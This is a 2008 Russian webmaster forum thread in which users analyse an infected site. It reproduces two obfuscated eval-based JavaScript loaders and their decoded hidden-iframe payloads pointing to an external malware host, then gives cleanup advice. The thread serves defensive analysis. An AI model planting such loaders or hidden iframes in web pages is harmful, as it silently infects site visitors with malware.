- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Подскажите в чём ошибка. тока не ругайте сильно т.к. я ещё новичёк.Сайт Перезагружается автоматом. Вот адрес www.kat-100.com [аккуратней со ссылкой! - возможно, вирус] кто поможет исправить ошибку в долгу не останусь.
Гы.. Дешифровать лень:
<script language=JavaScript>function riuetban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,9,1,25,44,17,19,60,62,39,0,0,0,0,0,0,8,41,15,7,46,36,51,4,28,37,34,56,48,47,35,61,22,30,55,26,2,0,49,40,57,24,27,0,0,0,0,53,0,3,23,14,58,33,20,13,6,45,29,5,54,43,42,31,18,16,38,10,32,59,52,50,11,21,12);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(130^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}riuetban('_McurRQO4hMONZ0OV0ZAhRcu9bSDrRQKR08X4ZBm_a0dloDnIdudEa0KMoDW4B8u90uD9ZQ4toDWVaoK0TndlZM7KlSmVs0dICBmmFcXiRnOilZAA87KlmcmLR8O4ZDnBBDOnFs7NFDXi0DnmJsiLhm4mrSAuQDXVT8XIrSAtsSOmZDOn0u4_nmWno8dImDO0huiJhMOuu8X0TnXmCM7DB88KwQu4ocW7dZmm6c7N08X7Pdn')</script>
...
<script language=JavaScript>function nuoban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,21,46,16,20,61,31,11,42,17,0,0,0,0,0,0,51,12,41,47,18,1,35,25,55,10,33,29,36,34,43,45,3,23,4,37,19,22,8,14,28,5,26,0,0,0,0,40,0,38,39,7,62,32,58,57,48,9,50,13,44,6,0,2,24,30,52,27,15,59,56,49,54,53,60);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(214^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}nuoban('Jd72jas_vQ8_HIf_S2qzDa72@m6ujasOF2ulvIIdJDfCMWN0wNdChDfOuWN5vqu2@2qOetugxQIBy2W5dI8_ajqdgQ2B0msBv072hasdMa6fwH0aHI8CvTZ2FMNldCgOMf7dLq72jau2d0t0STqgasd05c6OetugwH6zrs6_0IN_d22vLt25dWuCwfN_NcWvxQ8_C8ulNTCl0U8BfquNlFs2vW75_Nqd0o7BH2ul_c00')</script>
Progr@mmer\. добавил 31.01.2008 в 23:17
Всё таки дешифровал.. Залюбопытствовал :)
Вот первое:
window.status='Done';document.write('<iframe name=9ed3be src="http://3pigs.info/t/?'+Math.round(Math.random()*6230)+'9ed3be'+'" width=178 height=35 style="display:none"></iframe>')
Второе:
window.status='Done';document.write('<iframe name=c6e1 src="http://3pigs.info/t/?'+Math.round(Math.random()*32300)+'c6e1'+'" width=425 height=76 style="display:none"></iframe>')
Progr@mmer.,
судя по всему троян. Если антивирус не кричал меняйте пароли везде где только можно ;)
Dreammaker, вы перепутали меня с ТС :)
Progr@mmer., нет не перепутал :)
Если вы зашли на этот сайт броузером, и особенно, если это ИЕ...
Dreammaker, зашел. Оперой. Каспер не крякнул. Гм... *впал в думу великую, думу тяжкую*
Progr@mmer., отошлите урл в Лабораторию Касперского.
Dreammaker добавил 01.02.2008 в 00:53
проверил, через урл-сканер Дрвеба - он написал, что всё нормально.
потом, всунул туда урл из ифрейма - тоже сказал, что всё нормально, но указал, что есть и ещё ифреймы уже на этом сайте. И показал его адрес, при поиске в гугле на данный адрес были результаты, что там malware .
Похоже ТС не случайно оставил ссылку☝😮😡
Отрыл оперой, увидел запрос на китайский сайт (*.cn) быстро вышел, открыл ІЕ и в настройках прокси пописанный непонятний проксак!!! вот так то, ща оновил базы делаю проверку((
Удалил куксы броузера, почистил полностью кэш оперы (в файлах, которые скачались мне были крякозяблы... около 5 файлов съел. Размеры от 124 до 193 байт), удалил пасы из фтп-клиента.
Что ещё сделать, чтоб обезопасится?
Дайте, пожалуйста, в личку адрес тех новых ифреймов - я через другие сканеры попробую.
3ы: мог ли я заразить комп?
33ы: Сижу с телефона.
http://z-oleg.com
скачайте антивирусную утилиту обновите базы - выставьте все галки и просканьте комп (сейчас автор этой утилиты работает Лаборатории Касперского). И вышлите ему урл c описанием ситуации.
Наверное поздно, там уже стоит не чисто урл, а айпишник со скриптом, может быть сейчас он уже и не отдаёт вредоносное ПО, чтобы нельзя было попалить.
p.s. если телефон используется как модем, то по идее разницы нету, что телефон, что не телефон - опасность заражения есть. Плюсом есть, что не использовался ИЕ, но кто знает может и с оперой работает.
Спасибо, сейчас не смогу скачать - только завтра.
Завтра же и скачаю с другого компа обновления для своего каспера.
Если у кого антивирь найдет эту дрянь, то отпишите тут, что за антивирь стоит, а то я сомневаюсь, что базы каспера помогут :(